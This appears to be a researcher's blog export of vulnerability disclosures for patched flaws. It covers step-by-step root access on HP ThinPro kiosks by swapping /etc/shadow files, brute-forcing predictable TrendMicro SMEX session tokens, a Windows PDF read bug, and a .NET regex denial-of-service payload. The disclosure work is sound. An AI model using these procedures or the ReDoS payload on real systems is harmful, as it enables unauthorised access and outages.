Today, together with Vincent Hutsebaut (<a href="https://twitter.com/vhutsebaut">@vhutsebaut</a>), we are releasing a further technique to pwn the same thin client and get a root shell without authentication, in less than one minute!<br />
<br />
The attack detailed below is a typical kiosk attack which consists in a local privilege escalation which affects different versions of HP Thin Pro OS (HP ThinPro 4.4, HP ThinPro 5.0, HP ThinPro 5.1, HP ThinPro 5.2, HP ThinPro 5.2.1, HP ThinPro 6.0, HP ThinPro 6.1).<br />
<br />
The vulnerability (CVE-2016-2246) has been patched by HP and a technical bulletin has been <a href="https://h20565.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c05291676">published</a>. HP stated that they have fixed the issue before our report was sent to them and were on the way to publish a security bulletin when we contacted them.<br />
<br />
Since the patch is out, let's dive into the vulnerability, which is detailed step by step below.<br />
<br />
For those of you in rush, feel free to skip to the bottom of this post and watch the video.<br />
As usual, if you enjoy it, the authors would love to see this article shared and retweeted ;-)<br />
<b><br /></b>
<b>Description</b><br />
<br />
In HP Thin Pro OS, the sudo configuration allows an unauthenticated user to abuse the keyboard layout tool to perform a privilege escalation attack and gain unauthorised root access on the machine.<br />
<br />
The keyboard layout (located in "/usr/bin/hptc-keyboard-layout") runs as a privileged process and it is directly available to an unauthenticated user from the UI (user interface) of the HP Thin Pro Kiosk.<br />
<br />
By abusing the available UI controls, an unauthenticated user can navigate on the file system and restore the original /etc/shadow file on the system, which will then allow to set a new admin password on the system.<br />
<div>
<br /></div>
<div>
<div>
<b>Conditions</b></div>
<div>
<br /></div>
<div>
The following conditions are required:</div>
<div>
<br /></div>
<div>
- HP Thin OS Pro set in Kiosk mode;</div>
<div>
- HP Thin OS Pro administrator password has already been set by an administrator;</div>
<div>
- A malicious user has physical access to the Kiosk but does not have a user account and does not know the admin password.</div>
</div>
<div>
<br /></div>
<div>
<div>
Steps to reproduce (as a malicious user)</div>
<div>
<br /></div>
<div>
1) Click on the left side, "Control Panel" icon and then clicking the "Keyboard Layout" icon; ** note that the button and UI might be different from the OS version, but the keyboard layout tool is available to an unauthenticated user in Kiosk mode</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Step 1 – Figure 1<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_2URaUgdMKI9YGn8GaMnjcp-kByL5_Ose19eNLhuiXy0fSXQJRqXggOgrSMIq2ekzKYGZJp1TMlC413J617YYPaqNFXLZ_qd6fCCMEV7B7aggaN6qJG3-s18PR0OGSVhjPMYLKP5C19o/s1600/s1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="584" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_2URaUgdMKI9YGn8GaMnjcp-kByL5_Ose19eNLhuiXy0fSXQJRqXggOgrSMIq2ekzKYGZJp1TMlC413J617YYPaqNFXLZ_qd6fCCMEV7B7aggaN6qJG3-s18PR0OGSVhjPMYLKP5C19o/s640/s1.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
2) Click on print icon, a "Print File" dialog prompt is provided to the user</div>
<div>
<br /></div>
<div>
Step 2 – Figure 1</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBIKEyBQxXCdX7xrRnbbGgZSrJckxaQDntTeVYSpZLwflANOwBZfCedihTr9C7zdZdeNkU9v5rQfp6gx6k2CswXj3lmiev-VL93v0pNvlSEdceHSu5fzk0F_bYUv4N5xiKWXtXZ9bf2Sc/s1600/s2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="584" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBIKEyBQxXCdX7xrRnbbGgZSrJckxaQDntTeVYSpZLwflANOwBZfCedihTr9C7zdZdeNkU9v5rQfp6gx6k2CswXj3lmiev-VL93v0pNvlSEdceHSu5fzk0F_bYUv4N5xiKWXtXZ9bf2Sc/s640/s2.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
3) Print File dialog allows to set an "output file" - by clicking on the "..." button to choose the folder</div>
<div>
<br /></div>
<div>
Step 3 – Figure 1</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3v4Q9ZpJEiThgJmHHoSL59bXz6y2jfYsPJOG9y-AOCNj5zrdKOjpQ7t2glrmCYE_eBLKFDolvt_6X4vjDNmJaoPiDQCPSSBFczUK1S_9czu5TIyLXUq6Gak31F3jMzFm4VLaly6T5FXU/s1600/s3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="532" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3v4Q9ZpJEiThgJmHHoSL59bXz6y2jfYsPJOG9y-AOCNj5zrdKOjpQ7t2glrmCYE_eBLKFDolvt_6X4vjDNmJaoPiDQCPSSBFczUK1S_9czu5TIyLXUq6Gak31F3jMzFm4VLaly6T5FXU/s640/s3.png" width="640" /></a></div>
<div>
<br /></div>
<div>
Step 3 – Figure 2</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdwt27WYWLdiM9E-0XJTyq-NEVdGiU83Bx9tim4BrepySA9uScwHy3kz794jnM2ifsOFm5zMKAboDs-h0DhQe69c5aFVph1scPjgPpNsv3FxdDdCASxW9guUA-K8WnW9d5pBHtl_HKVss/s1600/s4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="482" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdwt27WYWLdiM9E-0XJTyq-NEVdGiU83Bx9tim4BrepySA9uScwHy3kz794jnM2ifsOFm5zMKAboDs-h0DhQe69c5aFVph1scPjgPpNsv3FxdDdCASxW9guUA-K8WnW9d5pBHtl_HKVss/s640/s4.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
4) Navigate to /etc/ folder</div>
<div>
<br /></div>
<div>
Step 4 – Figure 1</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQZEQxiIpNLXRB1hHNvoVRzcKbQhzoOgYouTxQw2KTehyphenhyphen8mZLYD_HTdARWEPkHeZTebPaI9R1uOI3CZuE_3MjvM-8fYALnyPHkCI8_Tp-ZUChKwlbBAPcoux5pGzXfchbtMJYt1uL1Lk8/s1600/s5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="504" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQZEQxiIpNLXRB1hHNvoVRzcKbQhzoOgYouTxQw2KTehyphenhyphen8mZLYD_HTdARWEPkHeZTebPaI9R1uOI3CZuE_3MjvM-8fYALnyPHkCI8_Tp-ZUChKwlbBAPcoux5pGzXfchbtMJYt1uL1Lk8/s640/s5.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
5) Rename /etc/shadow into /etc/shadow-last-modified-by-admin</div>
<div>
<br /></div>
<div>
Step 5 – Figure 1</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5fVmlGm0jvAmKHS11A3-isCM0UwjtrMJFWGjmBfNLKdpq5cC_1p804rjFryW_Xbla_F0i63cBHH7uyctCePn4bY2p3zOo0rWbNPmpV2Vo_6Z932nBh2O5zvA2mCqm6WD1A17Z-PBZ_Tg/s1600/s6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="492" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5fVmlGm0jvAmKHS11A3-isCM0UwjtrMJFWGjmBfNLKdpq5cC_1p804rjFryW_Xbla_F0i63cBHH7uyctCePn4bY2p3zOo0rWbNPmpV2Vo_6Z932nBh2O5zvA2mCqm6WD1A17Z-PBZ_Tg/s640/s6.png" width="640" /></a></div>
<div>
<br /></div>
<div>
Step 5 – Figure 2</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAiFzoVcfHDm0RHmc3ioOFP7wHtF2AcXVjwdyBnzLIYNhbexbYUgAJ87TZGv3cq2p8JhvDKAaVjRBq01y7lXZdWGSxFp3hWfKOuJbVVaQmgUhsm57-F-cfVU4cPsWhEtRHvPGv_OMW1E4/s1600/s7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="478" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAiFzoVcfHDm0RHmc3ioOFP7wHtF2AcXVjwdyBnzLIYNhbexbYUgAJ87TZGv3cq2p8JhvDKAaVjRBq01y7lXZdWGSxFp3hWfKOuJbVVaQmgUhsm57-F-cfVU4cPsWhEtRHvPGv_OMW1E4/s640/s7.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
6) Rename /etc/shadow- into /etc/shadow</div>
<div>
<br /></div>
<div>
Step 6 – Figure 1</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5o-Igo8nuc-mFkqfAFe5vKUtUxBdbwlQRUBWmY56F61sPP2juZ_lnphgzn0xm0tTxRIa_25y_Y4ejuko4-uiezS48CrJKwSYK9PZlBAgDfyda4EpFQD63A0OoD6Dm_nT40G2t5AMrtuU/s1600/s9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="496" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5o-Igo8nuc-mFkqfAFe5vKUtUxBdbwlQRUBWmY56F61sPP2juZ_lnphgzn0xm0tTxRIa_25y_Y4ejuko4-uiezS48CrJKwSYK9PZlBAgDfyda4EpFQD63A0OoD6Dm_nT40G2t5AMrtuU/s640/s9.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
7) Click on the "Administrator/User Mode Switch"</div>
<div>
<br /></div>
<div>
Step 7 – Figure 1</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJzWaQ0tUdzDyttGrZBdgHlJ-C25fWTIpGHap0UZylpjN66ZG-LnGlLF0fjFjHHqKSUAUWNjHvfXmmzgCmL4wFdxvbXvqiKMN9vLDSPz8b1OQllArT824UQIwqPuOdFlMi2qpKtGV9p5Y/s1600/s10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="458" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJzWaQ0tUdzDyttGrZBdgHlJ-C25fWTIpGHap0UZylpjN66ZG-LnGlLF0fjFjHHqKSUAUWNjHvfXmmzgCmL4wFdxvbXvqiKMN9vLDSPz8b1OQllArT824UQIwqPuOdFlMi2qpKtGV9p5Y/s640/s10.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
8) Malicious user can set a new admin password and access the administrator mode of the kiosk</div>
<div>
<br /></div>
<div>
Step 8 – Figure 1</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTr-OaJGhB9ppGszAjses0Ji76Di-UYvn46owEKdvqnhBU9XzElBu6h2xNQY_Pp80NsbXWhwe6ujxMZ7inZzLd8nIU03QbXDb_ORh06bHcAuwTZhEFxN_mEbvDTqKzqMx_a58KCZQU-vE/s1600/s11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="486" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTr-OaJGhB9ppGszAjses0Ji76Di-UYvn46owEKdvqnhBU9XzElBu6h2xNQY_Pp80NsbXWhwe6ujxMZ7inZzLd8nIU03QbXDb_ORh06bHcAuwTZhEFxN_mEbvDTqKzqMx_a58KCZQU-vE/s640/s11.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div>
9) Launch an xterminal with root access</div>
<div>
<br /></div>
<div>
Step 9 – Figure 1</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSDUWc93OuOLsTQY6BU7W6HLXVodrDANEEogXdQgFVtG4D0CnEKR3S9hZI7DkL1LVS8Z1O_Xr5L0ErcIp9J1-2AYhWClElA9vBi-Du0Y23kxvOV-wyKAnhVnulRVKQ1imudsD8O5Sk4VM/s1600/s12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSDUWc93OuOLsTQY6BU7W6HLXVodrDANEEogXdQgFVtG4D0CnEKR3S9hZI7DkL1LVS8Z1O_Xr5L0ErcIp9J1-2AYhWClElA9vBi-Du0Y23kxvOV-wyKAnhVnulRVKQ1imudsD8O5Sk4VM/s640/s12.png" width="640" /></a></div>
<div>
<br /></div>
<div>
Step 9 – Figure 2</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimSPXypEOlEqj3oX_E21au6i8OPA9rlh5GvNiHUGChRWr1CjTXdaqKk23AfBClyG8vUYlodGZ7SzNb8o6RickLW9B0bpq6lcC6lEugwgNbBxXdiKTp5Wyf2C_VyOMYqwqYFPXQyY5XdCU/s1600/s13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimSPXypEOlEqj3oX_E21au6i8OPA9rlh5GvNiHUGChRWr1CjTXdaqKk23AfBClyG8vUYlodGZ7SzNb8o6RickLW9B0bpq6lcC6lEugwgNbBxXdiKTp5Wyf2C_VyOMYqwqYFPXQyY5XdCU/s640/s13.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
<b>Further observations</b></div>
<div>
<br /></div>
<div>
The /etc/shadow- file remains as the original one even after that the admin password has been changed multiple times. In this example, passwd has already been set twice but the shadow- remains the one set originally in the OS (back in 2013), making the attack described possible.</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb6N9hicstCHAQjouUv379dqweZo25otBfgpXYYyzBcHJNfSdm0yMFEqtzO0QxHJZkBN78FS1qQrcnShAezN9DiMs9hugYQhiGs5AeaLRC6ApB5YBuYMFOWmhHyTygfdl9_TLHKw6ySUU/s1600/s14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb6N9hicstCHAQjouUv379dqweZo25otBfgpXYYyzBcHJNfSdm0yMFEqtzO0QxHJZkBN78FS1qQrcnShAezN9DiMs9hugYQhiGs5AeaLRC6ApB5YBuYMFOWmhHyTygfdl9_TLHKw6ySUU/s640/s14.png" width="640" /></a></div>
<div>
<br /></div>
<div>
In the sudoer configuration, it is possible to see the NOPASSWD tag set for the Keyboard Layout tool (usr/bin/hptc-keyboard-layout):</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9JukSnf9Gm2ivIV4ZVLOKAPgpFdNSdyKkRUV1YJ2nRR1XRz3v1KJTUXFNNnpyofEfqEb_I8EHsaUo-ohgLCynWJ5RO7486gSkD6UeOvmTEnymYcSmJdZKkoLZW8TufLqFvC2ZnFfkWHE/s1600/s15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="614" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9JukSnf9Gm2ivIV4ZVLOKAPgpFdNSdyKkRUV1YJ2nRR1XRz3v1KJTUXFNNnpyofEfqEb_I8EHsaUo-ohgLCynWJ5RO7486gSkD6UeOvmTEnymYcSmJdZKkoLZW8TufLqFvC2ZnFfkWHE/s640/s15.png" width="640" /></a></div>
<div>
<br /></div>
<div>
Below, a video showing the entire sequence:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/20d1Ti4eADc/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/20d1Ti4eADc?feature=player_embedded" width="320"></iframe></div>
<br /></div>
<div>
<br /></div>
<div>
If you like kiosks and more in particular you like to break them, then you absolutely need to try: <a href="http://ikat.ha.cked.net/">http://ikat.ha.cked.net/</a> . Greetz to Paul Craig, the "self-proclaimed" king of kiosks! ;-)</div>
Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com2tag:blogger.com,1999:blog-5593108060941425908.post-51097420409918917282016-09-14T18:16:00.000+02:002018-07-08T18:32:58.172+02:00Microsoft Windows PDF Library Information Disclosure Vulnerability - CVE-2016-3374 (MS16-115)In the last year, as a personal research project, I started to look more into browsers and decided to fuzz some high-level targets, such as Edge and IE11, together with <a href="http://srcincite.io/">Steven Seeley</a> (<a href="https://twitter.com/steventseeley">@steventseeley</a>).<br />
<br />
I have to admit that it is quite hard nowadays to approach this kind of research, especially with limited time and resources (just few virtual machines running at home…), but nevertheless it became an incredible learning experience.<br />
<br />
Given our constraints, the fuzzing focus was to target other things than common targeted components, such as DOM, JavaScript and so on, so we decided to go for the PDF file format.<br />
<br />
One of the interesting conditions that we found was the one that has just been patched by Microsoft and detailed in the <a href="https://technet.microsoft.com/library/security/MS16-115">MS16-115</a> security bulletin. The vulnerability is an out-of-bounds read which can lead to memory information disclosure.<br />
<br />
The technical advisory can be found at Steven Seeley's web site: <a href="http://srcincite.io/advisories/src-2016-0039/">http://srcincite.io/advisories/src-2016-0039/</a> .<br />
<div>
<br /></div>
<div>
References:</div>
<div>
<br /></div>
<div>
- Microsoft Security Bulletin MS16-115: <a href="https://technet.microsoft.com/library/security/MS16-115">https://technet.microsoft.com/library/security/MS16-115</a></div>
<div>
- SRC-2016-39 : Microsoft Windows PDF Library PostScript Calculator Out-of-Bounds Read Information Disclosure Vulnerability: <a href="http://srcincite.io/advisories/src-2016-39/">http://srcincite.io/advisories/src-2016-39/</a><br />
- Microsoft Acknowledgments: <a href="https://technet.microsoft.com/library/security/mt674627.aspx">https://technet.microsoft.com/library/security/mt674627.aspx</a></div>
Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com0tag:blogger.com,1999:blog-5593108060941425908.post-44149573849979293252016-05-20T00:20:00.001+02:002016-05-20T00:20:32.996+02:00TrendMicro ScanMail for Microsoft Exchange (SMEX) predictable session token - CVE-2015-3326It's time for another advisory (<a href="http://www.cvedetails.com/cve/CVE-2015-3326/">CVE-2015-3326</a>), a simple one, for a vulnerability which can be found quickly and trivially. For those of you who just want to give a glance at the post, I suggest to directly watch the picture which says it all!<br />
<br />
The following vulnerability was discovered on TrendMicro SMEX (ScanMail for Microsoft Exchange) 10 SP2 but it affects <a href="http://esupport.trendmicro.com/solution/en-US/1109669.aspx">other versions</a> as well.<br />
<br />
While surfing the SMEX web administrative interface using a web proxy, I have noticed something in the HTTP request - the session token itself and its format, a number.<br />
<br />
After observing a significant number of logins, the session token was always represented with an number composed of minimum 4 digits and maximum 5 digits, as shown in the screen shot below:<br />
<br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoJuIjtjHHC4BxqIRLTHmr5WX1G0gVqHiQtF-d3s5sKBRD_S0cH8g0t39i7QZ1lvh9rm0kfN0N6FVuGByImDgeYnqKLUGDFe2DVbKJ1quz3Y61focJDSyk4jNUAJTYRg7SK7vehOE1INk/s1600/s1.png" imageanchor="1"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoJuIjtjHHC4BxqIRLTHmr5WX1G0gVqHiQtF-d3s5sKBRD_S0cH8g0t39i7QZ1lvh9rm0kfN0N6FVuGByImDgeYnqKLUGDFe2DVbKJ1quz3Y61focJDSyk4jNUAJTYRg7SK7vehOE1INk/s640/s1.png" width="640" /></a></div>
<br />
Although the observed session tokens were never generated sequentially, the lack of a cryptographically strong PRNG for the session identifier, allows a malicious user to trivially guess the token. This attack can be easily automated.<br />
<br />
For example, in Burp proxy, the cool feature of <a href="https://portswigger.net/burp/help/intruder_using.html#uses_enumerating">Intruder</a> combined with a "<a href="https://portswigger.net/burp/help/intruder_payloads_types.html#numbers">number</a>" payload and even a single thread would suffice to guess a valid session token in a reasonable time.<br />
<br />
By targeting a "protected" page of SMEX administrative interface as a baseline request for Intruder and by examining the HTTP response, it is possible to infer whether the session token is valid or not.<br />
<br />
Once a valid token is obtained, a malicious user can impersonate another user's session on the system and gain unauthorised access to the SMEX administrative interface.<br />
<br />
References:<br />
<br />
Trend Micro Reference: <a href="http://esupport.trendmicro.com/solution/en-US/1109669.aspx">http://esupport.trendmicro.com/solution/en-US/1109669.aspx</a><br />
CVE reference: <a href="http://www.cvedetails.com/cve/CVE-2015-3326/">http://www.cvedetails.com/cve/CVE-2015-3326/</a><br />
Session Prediction: <a href="https://www.owasp.org/index.php/Session_Prediction">https://www.owasp.org/index.php/Session_Prediction</a><br />
<br />
<br />
<br />Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com1tag:blogger.com,1999:blog-5593108060941425908.post-28208157984785014372015-09-10T21:29:00.001+02:002018-07-08T18:07:44.489+02:00Microsoft .NET MVC ReDoS (Denial of Service) Vulnerability - CVE-2015-2526 (MS15-101)Microsoft released a security bulletin (<a href="https://technet.microsoft.com/en-us/library/security/ms15-101.aspx">MS15-101</a>) describing a .NET MVC Denial of Service vulnerability (<a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2526">CVE-2015-2526</a>) that I reported back in April. This blog post analyses the vulnerability in details, starting from the theory and then providing a PoC exploit against a MVC web application developed with Visual Studio 2013.<br />
For those of you who want to see the bug, you can directly skip to the last part of this post or watch the video directly... ;-)<br />
<br />
<b>A bit of theory</b><br />
<br />
The .NET framework (4.5 tested version) uses backtracking regular expression matcher when performing a match against an expression. Backtracking is based on the NFA (non-deterministic finite automata) algorithm engine which is designed to validate all input states. By providing an “evil” regex expression – an expression for which the engine can be forced to calculate an exponential number of states - it is possible to force the engine to calculate an exponential number of states, leading to a condition defined such as “catastrophic backtracking” aka <a href="https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS">ReDoS</a>.<br />
<br />
<b>The vulnerability</b><br />
<br />
In .NET Framework (4.5), “evil” regular expressions are used by default in three classes (EmailAddressAttribute, PhoneAttribute, UrlAttribute) which are part of System.CompontentModel.DataAnnotations .NET library.<br />
<br />
These classes provide the <b>default</b> validation mechanism for email address, phone number and URL input types in web forms. Furthermore, these three classes do not enforce a regex match timeout.<br />
<br />
The following screen shots show the evil regex and the lack of match timeout:<br />
<br />
<b><a href="http://referencesource.microsoft.com/#System.ComponentModel.DataAnnotations/DataAnnotations/EmailAddressAttribute.cs,11">EmailAddressAttribute Source code</a> </b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO6f_2DislvzTIQUdhlHi4GZzr2ashXsKCN3gNh2jmXJXFVn5IM2h1PJtccQ2Rqa2eA-c3D9e-PmSL0fW346R8vO5uvilXH1dcAukRpBkPA_YI-Fuh0SZSKJJTJwy6wKr2UhRD7BDfu2k/s1600/email.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO6f_2DislvzTIQUdhlHi4GZzr2ashXsKCN3gNh2jmXJXFVn5IM2h1PJtccQ2Rqa2eA-c3D9e-PmSL0fW346R8vO5uvilXH1dcAukRpBkPA_YI-Fuh0SZSKJJTJwy6wKr2UhRD7BDfu2k/s640/email.png" width="640" /></a></div>
<br />
<br />
<b><a href="http://referencesource.microsoft.com/#System.ComponentModel.DataAnnotations/DataAnnotations/PhoneAttribute.cs,9">PhoneAttribute Source Code</a></b><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtp4W988odbzZr0wGmi2oQ9n-OpMqpLLRPZgcupMjVB9G1cIhYSgA4ExfJtCmy_57tC6GlPFB7sKFORNkzW7khCv5r76OdULeHgzVDW0tEHAqq2HkU6xJWj2qn_D2Se8Y_cH-8tlEbNqk/s1600/phone.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="299" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtp4W988odbzZr0wGmi2oQ9n-OpMqpLLRPZgcupMjVB9G1cIhYSgA4ExfJtCmy_57tC6GlPFB7sKFORNkzW7khCv5r76OdULeHgzVDW0tEHAqq2HkU6xJWj2qn_D2Se8Y_cH-8tlEbNqk/s640/phone.png" width="640" /></a></div>
<br />
<b><a href="http://referencesource.microsoft.com/#System.ComponentModel.DataAnnotations/DataAnnotations/UrlAttribute.cs,11">UrlAttribute Source Code</a></b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6J5BzF75ab2im67OpS-fqv9vk4gqH2c3CVeUulPZ4VgsHKJ_OUWF9dXiB1a-nysoDqhMu4A-2txpmZxHvefPLIVyCVeyVCu1_-6SgOkBuTvnISGCWJ19wKtOlir81Qn2XMGkggNYTtmQ/s1600/url.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6J5BzF75ab2im67OpS-fqv9vk4gqH2c3CVeUulPZ4VgsHKJ_OUWF9dXiB1a-nysoDqhMu4A-2txpmZxHvefPLIVyCVeyVCu1_-6SgOkBuTvnISGCWJ19wKtOlir81Qn2XMGkggNYTtmQ/s640/url.png" width="640" /></a></div>
<br />
As a consequence, an attacker can craft a malicious payload to force the .NET regex engine to perform a large number of computations and cause a Denial of Service against the targeted controller (e.g. login form) which uses default validation mechanism provided by .NET framework.<br />
<br />
The Denial of Service condition is only specific to the target class controller (e.g. login form, registration form, contact form, etc.). Users can still potentially navigate the site but they are prevented from using parts of it.<br />
<div>
<br /></div>
<div>
<div>
As an example, the .NET email address regex is analyzed. Its regex expression is considered an “evil” regex, due to its complexity, repetition, nesting and recursion. The regex is reported in the screen shot below. The software RegexBuddy was used to analyze it.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvU_YzFkNnO9Acpdk8do5tEv4MDtQgvV46Kg3ZR8BNCsNz3HQCmPIK9fi6wXY-S2aqDju8vSEpwAHqjG8QtyiEnr9reJpnD3oucaGlNECP9XkP5UXIDqj8a66dIQXBPfAR_UvNKtqNsUM/s1600/regex-analysis.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvU_YzFkNnO9Acpdk8do5tEv4MDtQgvV46Kg3ZR8BNCsNz3HQCmPIK9fi6wXY-S2aqDju8vSEpwAHqjG8QtyiEnr9reJpnD3oucaGlNECP9XkP5UXIDqj8a66dIQXBPfAR_UvNKtqNsUM/s640/regex-analysis.png" width="640" /></a></div>
<div>
<br /></div>
<div>
The theory of the attack is demonstrated below, with the help of RegexBuddy and its built-in debugger (set for C# - .NET 2.0-4.5) - with payload (in the table below) which will never match the above regex:</div>
<div>
<br /></div>
<div>
t@t.t.t.t.t.t.t.t.t.t.t.t.t.t.t%20</div>
<div>
<br /></div>
<div>
An extract of the last 26 operations (stopped by RegexBuddy) can be found below, from the Debugger view:</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-DZ454YxYiihbiaN7ENZdBgwNGTkCmGQJ7VUoXI7bB7crLU_bCtM2tV3j0aU9fC3UCoemh2rZ7zUHxr3GkyffFRkMtU4DQIslxU4C7Epe74Bzr5DSMyURGJCwPJqj6O2KaYgyhD37qhI/s1600/regex-analysis2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="454" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-DZ454YxYiihbiaN7ENZdBgwNGTkCmGQJ7VUoXI7bB7crLU_bCtM2tV3j0aU9fC3UCoemh2rZ7zUHxr3GkyffFRkMtU4DQIslxU4C7Epe74Bzr5DSMyURGJCwPJqj6O2KaYgyhD37qhI/s640/regex-analysis2.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div>
This shows the “catastrophic backtracking” condition reached by the matcher. In this case, RegexBuddy stops calculations after one million steps, however, the vulnerable class – EmailAddressAttribute - does not enforce a match timeout and therefore the .NET regex engine continues to compute steps, leading the w3wp.exe process (IIS Worker Pool) on the web server to reach a 99% CPU starvation condition for an extended amount of time, which can last various hours to days, depending on the payload used.</div>
<div>
<br /></div>
<div>
The payload can be constructed in different ways, providing the attacker with the capability to bypass IDS/IPS signature based controls. The attacker can set scripts to automatically attack vulnerable forms on a regular time basis.</div>
</div>
<div>
